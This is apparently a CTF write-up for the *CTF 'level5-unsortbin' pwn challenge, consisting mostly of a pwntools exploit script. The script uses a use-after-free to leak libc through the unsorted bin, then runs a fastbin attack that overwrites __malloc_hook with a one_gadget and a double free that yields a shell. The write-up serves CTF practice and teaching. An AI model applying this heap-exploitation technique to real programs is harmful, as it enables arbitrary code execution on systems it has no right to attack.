
    *CTF unsorted bin leak & fastbin attack level5-unsortbin Writeup

    November 19, 2020 • Read: 522 • Pwn

    UNCTF2020中的babyheap,官方wp用的是unsorted bin attack修改fastbin最大大小。
    所以特意看了一下这题,结果发现这题是unsorted bin leak,不过不做白不做,花了一个小时做掉了。
    等一下会找一下unsorted bin attack的题目
    待补充...

    # -*- coding: utf-8 -*-
    from pwn import *
    context.log_level = "debug"   # pwntools: log every byte sent/received, so prompt matching below can be checked
    #r = process('./level5-unsortbin')
    r = remote("pwn.sixstars.team", 22505)   # challenge service used by the writeup; the commented process() line is the offline alternative
    elf = ELF('./libc.so.6')   # the libc shipped with the challenge; used only for its symbol offsets (elf.sym) when computing libc_base
    #elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    def add_note(size):
        """Menu option 1: allocate a note, answering the size prompt with *size*."""
        dialogue = ((">> ", "1"), ("Size:", str(size)))
        for prompt, reply in dialogue:
            r.sendlineafter(prompt, reply)
    
    def show_note(idx):
        """Menu option 2: ask the target to print note *idx*.

        The script later calls this on an id it has already deleted, so it
        relies on the target not rejecting freed ids.
        """
        dialogue = ((">> ", "2"), ("id:", str(idx)))
        for prompt, reply in dialogue:
            r.sendlineafter(prompt, reply)
    
    def edit_note(idx, content):
        """Menu option 3: overwrite note *idx* with *content* (sent as one line)."""
        dialogue = (
            (">> ", "3"),
            ("id:", str(idx)),
            ("Content:", content),
        )
        for prompt, reply in dialogue:
            r.sendlineafter(prompt, reply)
    
    def dele_note(idx):
        """Menu option 4: delete note *idx*.

        The script deletes the same id twice later on, so it relies on the
        target not clearing or validating the slot after the first free.
        """
        dialogue = ((">> ", "4"), ("id:", str(idx)))
        for prompt, reply in dialogue:
            r.sendlineafter(prompt, reply)
    
    
    # Root cause the whole script depends on: the target keeps a note's pointer
    # after delete, so a freed note can still be shown (read) and edited (write).
    # Clearing the pointer on delete and rejecting ids that are not live would
    # stop both the leak and the write below.
    #
    # Step 1: leak a libc address.
    add_note(200)     # note 0; sized so that freeing it goes to the unsorted bin (per the writeup title) -- confirm against the binary
    add_note(0x68)    # note 1; fastbin-sized, reused in step 3
    dele_note(0)
    show_note(0)      # show after free: the freed chunk's fd is printed back
    #main_arena + 0x58 = leak addr
    #main_arena - 0x10 = __malloc_hook
    #__malloc_hook = leak_addr - 0x68
    malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68   # 6 leaked bytes, zero-padded to a full 8-byte pointer
    libc_base = malloc_hook_addr - elf.sym['__malloc_hook']     # elf is ./libc.so.6, so sym[] is the in-library offset
    
    # one_gadget offsets are specific to one libc build; these appear to be for the
    # libc-2.23 referenced in the commented-out ELF() line above -- verify before reuse.
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_gadget = libc_base + one[2]
    print "__malloc_hook: " + hex(malloc_hook_addr)
    print "one_gadget: " + hex(one_gadget)
    
    # Step 2: fastbin attack -- write into a freed fastbin chunk, then reallocate.
    dele_note(1)                                  # note 1 goes to the fastbin
    edit_note(1, p64(malloc_hook_addr - 0x23))    # edit after free: the 0x23 offset is the writeup's choice, not derived here
    add_note(0x68)                                # note 2; presumably gets note 1's old chunk back -- confirm
    add_note(0x68)                                # note 3; presumably served from the address written above -- confirm
    
    edit_note(3, 'a' * 0x13 + p64(one_gadget))    # per the writeup, this write overlaps __malloc_hook
    #gdb.attach(r)
    dele_note(1)                                  # note 1's id is still usable after the earlier delete
    dele_note(1)                                  # same id freed again; the writeup relies on this to reach the overwritten hook
    r.interactive()
    